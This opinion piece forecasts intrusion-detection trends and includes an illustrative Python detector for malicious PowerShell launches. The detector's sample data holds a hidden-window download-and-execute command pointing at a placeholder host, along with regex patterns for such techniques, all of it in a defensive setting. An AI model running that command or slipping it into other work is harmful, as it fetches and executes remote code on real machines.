The future of intrusion detection

It’s always an interesting exercise to extrapolate from current technologies and industry challenges to sketch the future landscape. This especially holds true for cyber security, with its rapid growth and change as new threat types, targets and counter techniques emerge almost daily. While hard and fast predictions fall beyond my purview, I see several trends likely to dominate the field in the upcoming years, particularly around intrusion detection.

As a refresher, intrusion detection systems (IDS) identify when someone or something attempts to compromise a system or resource. Detection mechanisms include signature-based methods – comparing a pattern or signature to previous events – and behavior analysis, which detects anomalous actions.

Over the next several years, intrusion detection will evolve in two directions:

IoT: An expanding attack surface

Intrusion detection systems, algorithms and data analysis must take the emerging IoT into the equation. Attackers can breach organizations from multiple points via cameras, automotive or wearable devices. In order to deduce the intruder path, multiple sources of data from all IoT devices in the organization will have to be distilled into a centralized place.

No more hide and seek: It’s time for event detection

Cyber criminals are developing new and innovative attacks that employ evasive and polymorphic techniques to escape detection. These techniques render the old hermetic intrusion detection paradigm useless. The best-known example is anti-forensic malware. As a first step of its execution, such malware determines whether an AV or IDS is “in the area.” If so, it takes one or more evasive actions: (1) it employs special techniques to evade the specific detection algorithm; (2) it remains dormant, hiding its malicious intent until it is in a “safe” environment; (3) it attacks the defense system itself. Close to 80% of current malware uses anti-forensic techniques at some level.

But this is only one type of evasive attack. Some attacks are non-persistent, residing only in memory and leaving no footprint on the hard drive. For example, the PowerWare ransomware program that recently targeted the healthcare industry blends in with legitimate computer activity by using Windows PowerShell to download a malicious script. Many AVs and IDSs are “file scanning oriented” and hence can be bypassed by such attacks.

Moreover, as found by Google researchers, security suites themselves contain vulnerabilities, which allow malware not only to bypass or evade the security systems, but to use them for their own purposes.

In the future, instead of detecting an intruder, detection systems will identify a suspicious event and let the system administrator or security officer decide whether to start an investigation. We will probably see more and more forensic teams involved in cyber incidents performing in-depth analysis of events suspected to be an intrusion. In addition, AI algorithms will evolve to help security products continuously learn attacks and their behaviors, make connections between suspicious events, and predict future evolutions of an attack.
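As an added illustration (not part of the original article) of the event-detection model above, applied to the PowerShell download pattern described for PowerWare: a small Python detector that inspects process-creation records, flags script-host launches whose command line shows a network download, in-memory execution, an encoded command or a hidden window, and queues them for an analyst instead of blocking. The log records, the `image|command line` format and the indicator list are constructed for this example.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Indicators of "PowerShell fetches a script over the network and runs it in memory".
# Each entry: (reason label, case-insensitive regex applied to the command line).
INDICATORS = [
    ("network-download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("in-memory-execution", re.compile(r"Invoke-Expression|\bIEX\b", re.I)),
    ("encoded-command", re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I)),
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
]

# Constructed process-creation records (stand-in for real telemetry): "image|command line".
SAMPLE_EVENTS = [
    "powershell.exe|powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
    "powershell.exe|powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')\"",
    "powershell.exe|powershell.exe -ec QQBCAEMA",
    "svchost.exe|svchost.exe -k netsvcs",
]


@dataclass
class SuspiciousEvent:
    """One triage item: what ran, how, and which indicators fired."""
    image: str
    command_line: str
    reasons: List[str] = field(default_factory=list)


def parse_event(line):
    """Split a constructed 'image|command line' record into its two fields."""
    image, _, cmd = line.partition("|")
    return image.strip().lower(), cmd.strip()


def detect(lines):
    """Return a SuspiciousEvent for every PowerShell launch matching at least one indicator.
    Nothing is blocked here: the result is a queue for a human to decide whether to investigate."""
    events = []
    for line in lines:
        image, cmd = parse_event(line)
        if image not in ("powershell.exe", "pwsh.exe"):
            continue  # file-scanning is irrelevant; we only look at how the script host was invoked
        reasons = [name for name, rx in INDICATORS if rx.search(cmd)]
        if reasons:
            events.append(SuspiciousEvent(image, cmd, reasons))
    return events


if __name__ == "__main__":
    for ev in detect(SAMPLE_EVENTS):
        print(f"[suspicious] {ev.image}: {', '.join(ev.reasons)} :: {ev.command_line}")
```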

Detection will take a backseat to prevention

As it becomes increasingly difficult and costly to detect intrusions and quickly neutralize them, systems that do not rely on first detecting an attack to limit damage to a company will be added to the security stack. One method is to reduce or obfuscate the attack surface itself so that target vulnerabilities cannot be found. We’ll see increasing use by cyber security providers of hacker-type deception techniques. Such prevention methods can be loosely grouped in a category known as Moving Target Defense (MTD). In contrast to NIDS and HIDS, MTD continuously and persistently changes the attack surface, preventing the enemy from entering in the first place.

Other trends

Cyber insurance is something that will probably receive increased attention. More organizations will suffer from data loss, data leakage, sabotage and espionage as a result of breaches. The damage from such events could be much higher than that of a traditional fire or theft event.

The human factor will grow in all aspects of cyber security. More and more human analysis, incident-response teams and forensic crews will be involved in almost every company to complement the traditional intrusion-detection and intrusion-prevention systems. The automotive industry will need to incorporate defensive intrusion prevention and detection solutions into their cars, as the impact of attacks could be disastrous.

The upshot?

The cyber security arena will expand in all aspects: More data, more devices around us, more attack vectors and more cyber physical threats.
